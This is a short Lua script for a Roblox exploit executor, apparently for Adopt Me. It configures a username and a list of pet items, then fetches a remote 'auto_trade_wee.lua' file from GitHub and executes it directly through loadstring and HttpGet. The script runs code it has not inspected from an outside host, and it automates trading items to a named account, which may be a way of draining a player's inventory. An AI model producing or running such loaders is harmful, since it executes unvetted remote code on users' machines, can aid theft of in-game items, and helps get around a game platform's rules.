

task.spawn(function()
    getgenv().Config = {
        ["inventory"] = "pets", -- Adapt to stickers, gifts, toys, pet_accessories, transport, gifts
        ["username"] = "IceTurb0Haze",
        ["pets_to_trade"] = {"aztec_egg_2025_winged_snake","aztec_egg_2025_temple_friend","aztec_egg_2025_golden_lynx","aztec_egg_2025_xiucohtl","house_pets_2025_french_bulldog","aztec_egg_2025_ahuizotl"} 
    }

    loadstring(game:HttpGet("https://raw.githubusercontent.com/diwserenityhub/other/refs/heads/main/auto_trade_wee.lua"))()
end)
